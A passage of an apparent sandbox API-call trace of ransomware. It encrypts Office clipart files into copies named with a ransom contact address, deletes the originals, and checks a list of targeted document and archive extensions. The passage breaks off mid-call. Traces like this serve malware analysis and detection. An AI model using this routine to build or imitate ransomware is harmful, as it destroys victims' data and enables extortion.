SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.614] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.614] GetLastError () returned 0x0 [0065.614] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x721c, lpOverlapped=0x0) returned 1 [0065.617] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x7220, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x7220, lpOverlapped=0x0) returned 1 [0065.618] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0065.618] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0065.618] SetEndOfFile (hFile=0x340) returned 1 [0065.618] CloseHandle (hObject=0x340) returned 1 [0065.623] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.623] SetEndOfFile (hFile=0x350) returned 1 [0065.624] CloseHandle (hObject=0x350) returned 1 [0065.624] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0065.624] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00086_.wmf")) returned 1 [0065.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.625] lstrlenW (lpString=".doc") returned 4 [0065.625] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0065.625] lstrlenW (lpString=".docx") returned 5 [0065.625] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0065.625] lstrlenW (lpString=".pdf") returned 4 [0065.625] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0065.625] lstrlenW (lpString=".xls") returned 4 [0065.625] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0065.625] lstrlenW (lpString=".xlsx") returned 5 [0065.625] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0065.625] lstrlenW (lpString=".ppt") returned 4 [0065.625] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0065.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.625] lstrlenW (lpString=".zip") returned 4 [0065.625] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0065.625] lstrlenW (lpString=".rar") returned 4 [0065.625] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0065.625] lstrlenW (lpString=".bz2") returned 4 [0065.625] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0065.625] lstrlenW (lpString=".7z") returned 3 [0065.625] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0065.625] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.626] lstrlenW (lpString=".dbf") returned 4 [0065.626] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0065.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.626] lstrlenW (lpString=".1cd") returned 4 [0065.626] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0065.626] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00086_.WMF") returned 68 [0065.626] lstrlenW (lpString=".jpg") returned 4 [0065.626] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0065.626] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.626] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0065.626] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0065.627] GetLastError () returned 0x0 [0065.627] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x3772, lpOverlapped=0x0) returned 1 [0066.067] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x3780, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x3780, lpOverlapped=0x0) returned 1 [0066.068] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.068] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.068] SetEndOfFile (hFile=0x340) returned 1 [0066.069] CloseHandle (hObject=0x340) returned 1 [0066.069] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.069] SetEndOfFile (hFile=0x350) returned 1 [0066.070] CloseHandle (hObject=0x350) returned 1 [0066.070] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.070] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00090_.wmf")) returned 1 [0066.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.070] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.070] lstrlenW (lpString=".doc") returned 4 [0066.071] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString=".docx") returned 5 [0066.071] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.071] lstrlenW (lpString=".pdf") returned 4 [0066.071] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString=".xls") returned 4 [0066.071] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.071] lstrlenW (lpString=".xlsx") returned 5 [0066.071] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.071] lstrlenW (lpString=".ppt") returned 4 [0066.071] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.071] lstrlenW (lpString=".zip") returned 4 [0066.071] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.071] lstrlenW (lpString=".rar") returned 4 [0066.071] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString=".bz2") returned 4 [0066.071] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString=".7z") returned 3 [0066.071] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.071] lstrlenW (lpString=".dbf") returned 4 [0066.071] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.071] lstrlenW (lpString=".1cd") returned 4 [0066.071] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.071] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00090_.WMF") returned 68 [0066.071] lstrlenW (lpString=".jpg") returned 4 [0066.071] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.072] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.072] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.072] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.072] GetLastError () returned 0x0 [0066.072] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1ec6, lpOverlapped=0x0) returned 1 [0066.123] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1ed0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1ed0, lpOverlapped=0x0) returned 1 [0066.124] ReadFile (in: hFile=0x350, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.124] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.124] SetEndOfFile (hFile=0x340) returned 1 [0066.124] CloseHandle (hObject=0x340) returned 1 [0066.124] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.124] SetEndOfFile (hFile=0x350) returned 1 [0066.125] CloseHandle (hObject=0x350) returned 1 [0066.125] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.126] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00403_.wmf")) returned 1 [0066.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.126] lstrlenW (lpString=".doc") returned 4 [0066.126] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.126] lstrlenW (lpString=".docx") returned 5 [0066.126] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.126] lstrlenW (lpString=".pdf") returned 4 [0066.126] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.126] lstrlenW (lpString=".xls") returned 4 [0066.126] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.126] lstrlenW (lpString=".xlsx") returned 5 [0066.126] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.126] lstrlenW (lpString=".ppt") returned 4 [0066.126] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.126] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.126] lstrlenW (lpString=".zip") returned 4 [0066.127] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.127] lstrlenW (lpString=".rar") returned 4 [0066.127] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.127] lstrlenW (lpString=".bz2") returned 4 [0066.127] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.127] lstrlenW (lpString=".7z") returned 3 [0066.127] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.127] lstrlenW (lpString=".dbf") returned 4 [0066.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.127] lstrlenW (lpString=".1cd") returned 4 [0066.127] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.127] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00403_.WMF") returned 68 [0066.127] lstrlenW (lpString=".jpg") returned 4 [0066.127] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.135] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.135] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.135] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.137] GetLastError () returned 0x0 [0066.138] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2afa, lpOverlapped=0x0) returned 1 [0066.260] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2b00, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2b00, lpOverlapped=0x0) returned 1 [0066.260] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.260] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.261] SetEndOfFile (hFile=0x2c0) returned 1 [0066.261] CloseHandle (hObject=0x2c0) returned 1 [0066.261] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.261] SetEndOfFile (hFile=0x368) returned 1 [0066.262] CloseHandle (hObject=0x368) returned 1 [0066.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00414_.wmf")) returned 1 [0066.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.262] lstrlenW (lpString=".doc") returned 4 [0066.262] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.262] lstrlenW (lpString=".docx") returned 5 [0066.262] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.262] lstrlenW (lpString=".pdf") returned 4 [0066.262] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.262] lstrlenW (lpString=".xls") returned 4 [0066.262] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.262] lstrlenW (lpString=".xlsx") returned 5 [0066.262] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.262] lstrlenW (lpString=".ppt") returned 4 [0066.262] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.263] lstrlenW (lpString=".zip") returned 4 [0066.263] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.263] lstrlenW (lpString=".rar") returned 4 [0066.263] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.263] lstrlenW (lpString=".bz2") returned 4 [0066.263] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.263] lstrlenW (lpString=".7z") returned 3 [0066.263] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.263] lstrlenW (lpString=".dbf") returned 4 [0066.263] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.263] lstrlenW (lpString=".1cd") returned 4 [0066.263] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00414_.WMF") returned 68 [0066.263] lstrlenW (lpString=".jpg") returned 4 [0066.263] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.263] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.263] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.264] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.264] GetLastError () returned 0x0 [0066.264] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x13ea, lpOverlapped=0x0) returned 1 [0066.274] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x13f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x13f0, lpOverlapped=0x0) returned 1 [0066.274] ReadFile (in: hFile=0x368, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.274] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.274] SetEndOfFile (hFile=0x2c0) returned 1 [0066.285] CloseHandle (hObject=0x2c0) returned 1 [0066.308] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.308] SetEndOfFile (hFile=0x368) returned 1 [0066.314] CloseHandle (hObject=0x368) returned 1 [0066.318] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.318] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00438_.wmf")) returned 1 [0066.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.334] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.334] lstrlenW (lpString=".doc") returned 4 [0066.334] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.334] lstrlenW (lpString=".docx") returned 5 [0066.334] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.334] lstrlenW (lpString=".pdf") returned 4 [0066.334] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString=".xls") returned 4 [0066.335] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.335] lstrlenW (lpString=".xlsx") returned 5 [0066.335] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.335] lstrlenW (lpString=".ppt") returned 4 [0066.335] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.335] lstrlenW (lpString=".zip") returned 4 [0066.335] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.335] lstrlenW (lpString=".rar") returned 4 [0066.335] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString=".bz2") returned 4 [0066.335] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString=".7z") returned 3 [0066.335] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.335] lstrlenW (lpString=".dbf") returned 4 [0066.335] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.335] lstrlenW (lpString=".1cd") returned 4 [0066.335] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.335] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00438_.WMF") returned 68 [0066.335] lstrlenW (lpString=".jpg") returned 4 [0066.335] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.336] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.336] SetFilePointerEx (in: hFile=0x2c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.336] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00775_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00775_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0066.337] GetLastError () returned 0x0 [0066.337] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x2b90, lpOverlapped=0x0) returned 1 [0066.354] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x2ba0, lpOverlapped=0x0) returned 1 [0066.355] ReadFile (in: hFile=0x2c8, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.355] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, 